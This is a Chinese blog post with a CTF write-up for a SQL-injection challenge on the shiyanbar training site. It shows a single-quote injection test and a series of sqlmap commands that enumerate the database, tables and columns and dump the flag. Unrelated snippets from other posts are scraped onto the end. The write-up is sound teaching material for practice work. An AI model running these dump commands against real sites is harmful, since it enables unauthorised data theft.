这个看起来有点简单!——实验吧

今天有点时间就多写几篇解题思路吧,

希望能够帮助到那些需要帮助的人,

所有的wp都是以一题一篇的形式写出

主要是为了能够让读者更好的阅读以及查找,

希望你们不要责怪!!共勉!!!

这一题做的时间比较久,但是收获颇多!!!!

永远爱你们的————新宝宝

这个看起来有点简单!分值:10

  • 来源: 西普学院
  • 难度:易
  • 参与人数:14133人
  • Get Flag:5392人
  • 答题人数:6278人
  • 解题通过率:86%

很明显。过年过节不送礼,送礼就送这个

格式:

解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1

解题思路:看过视频之后,按照视频的教程解答可是怎么做就是不对,最后发现注入的网址不正确(QAQ),虽然浪费了很长的时间但是总的来说还是值得的;

首先:需要对这个网址进行手工检测是否存在sql注入(经典id=1‘加入单引号提交,结果:

如果出现错误提示,则该网站可能就存在注入漏洞)使用sqlmap爆出当前数据库:

使用命令:python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db得到当前数据库:my_db

发现可能存在key于是输入命令:

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db—tables

得到:

再继续:

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey –columns就会得到:

然后把k0y里面值爆出来就好:需要输入:

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

最后得到答案:whatiMyD91dump

如果有什么不明白的地方,留言或者加我!!! 
我很菜,所以我会努力的! 
努力是因为不想让在乎的人失望! 
博主整理不易,如果喜欢推荐关注一下博主哦!

博主喜欢广交好友下面是我的联系方式: 
QQ:1263030049

微信:liu1263030049
加好友前请注明原因谢谢!

原文地址:https://www.cnblogs.com/lxz-1263030049/p/9157312.html

时间: 2024-10-07 16:10:59

这个看起来有点简单!——实验吧的相关文章

由索引引出简单实验几例

由索引引出简单实验几例 ***********************************************声明************************************************ 原创作品,出自 "深蓝的blog" 博客,欢迎转载,转载时请务必注明出处(http://blog.csdn.net/huangyanlong). 表述有错误之处,请您留言,不胜感激. 提醒:点击目录,更有助于您的查看. *************************

SDN入门,简单实验

网上大多数视频教程都是用virtualbox做演示的,我的电脑不知道怎么回事无法正常启动,于是用性能更好的vmware workstation来做实验,今天终于搞定,装上了MiniNet. 从www.openflow.org的tutorial下载mininet的2.0版本,里面有一个简单搭好的topo host2-----Switch0-----host3 VMware载入mininet,用户名和密码均为openflow. Step1  启动mininet Step2   查询网络情况 node

[Python Fabric] [SSH] Mac OS X 10.9 + Vagrant虚拟环境使用Python Fabric进行SSH远程登录的简单实验

1. ssh客户端生成key 1 $ ssh-keygen -t rsa -b 4096 2 Generating public/private rsa key pair. 3 Enter file in which to save the key (/Users/(username)/.ssh/id_rsa): vagrantid_rsa 4 Enter passphrase (empty for no passphrase): 5 Enter same passphrase again: 6

CTF---Web入门第三题 这个看起来有点简单!

这个看起来有点简单!分值:10 来源: 西普学院 难度:易 参与人数:10515人 Get Flag:3441人 答题人数:4232人 解题通过率:81% 很明显.过年过节不送礼,送礼就送这个 格式: 解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1 原题链接:http://www.shiyanbar.com/ctf/33 [解题报告] 这是我入门Web开始写的第三道题,这道题看样子通过率还蛮高,难易程度显示易,咱们可以试试这题!咱们点开这个题看一

进程与线程简单实验

[实验要求]: 学习fork函数,exec函数,pthread函数的使用,阅读源码,分析三个函数的机理. [代码实现]: 进程A创建子进程B 进程A打印hello world,进程B实现Sum累加 进程B有两个线程,主线程创建子线程实现Sum累加 分析各执行体处理器使用,内存使用等基本信息 [分析] 要写这个先得看fork exec pthread函数啦! 有几个博客很有帮助 https://www.cnblogs.com/amanlikethis/p/5537175.html https://

21.这个看起来有点简单

这题就是个sqi注入的: 手工注入: 我先是简单尝试,就发现了,可以执行sql语句 http://ctf5.shiyanbar.com/8/index.php?id=2 group by 2 没报错 http://ctf5.shiyanbar.com/8/index.php?id=2 gourp by 3 报错 说明我们有两个字段可以提供给我们使用,比如说如下语句 http://ctf5.shiyanbar.com/8/index.php?id=2 union select 1,2 那么就简单了

Java单例模式——并非看起来那么简单

版权声明:本文为[viclee]原创,如需转载请注明出处~ Java中单例(Singleton)模式是一种广泛使用的设计模式.单例模式的主要作用是保证在Java程序中,某个类只有一个实例存在.一些管理器和控制器常被设计成单例模式. 单例模式有很多好处,它能够避免实例对象的重复创建,不仅可以减少每次创建对象的时间开销,还可以节约内存空间:能够避免由于操作多个实例导致的逻辑错误.如果一个对象有可能贯穿整个应用程序,而且起到了全局统一管理控制的作用,那么单例模式也许是一个值得考虑的选择. 单例模式有很

C 语言访问MySQL数据库的简单实验

首先,建立一个MySQL用户rick,密码设置为6452079,登录地点设置为本地登录localhost. 为rick用户创建一个数据库foo. 在数据库foo里创建一个表children. 表的结构如下: 添加3条简单的记录后,表为: 实验C 代码: #include <stdio.h> #include <stdlib.h> #include "mysql.h" MYSQL my_connection; MYSQL_RES *res_ptr; MYSQL_R

一则关于控制文件全部丢失后如何重新编目RMAN元数据的简单实验

主题:一则简单的RMAN元数据编目实验,来自于博客园AskScuti. 场景:RMAN备份完整情况下,未使用Catalog目录库.删除了所有的控制文件,在手工重建后,导致记录在控制文件中的RMAN备份元数据丢失. 目录 1. RMAN备份 2. 删除所有控制文件 3. 重建控制文件 4. 重新编目元数据 5. 验证可用性 1. RMAN备份 更改RMAN控制文件自动全备选项(建议开启) RMAN> show all; using target database control file inst